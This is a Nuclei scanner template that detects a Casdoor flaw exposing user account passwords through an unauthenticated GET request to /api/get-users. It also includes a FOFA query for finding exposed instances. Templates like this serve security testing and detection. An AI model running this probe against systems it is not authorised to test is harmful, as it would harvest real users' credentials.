id: casdoor-users-password

info:
  name: Casdoor get-users Account Password Disclosure
  author: DhiyaneshDk
  severity: high
  description: Casdoor get-users Account Password is exposed.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
    - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go
  classification:
    cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: casbin
    product: casdoor
    fofa-query: title="Casdoor"
  tags: casdoor,exposure,misconfig,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/get-users?p=123&pageSize=123"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":'
          - '"password":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b90d42990ccf1ae9efbaf1ca1928b5fa23de04e43da0253b35bceec094726aee02202ee628a6864a4dc511eb6928d340ecef3abbb18879438f75c239a4bb99270496:922c64590222798bb761d5b6d8e72950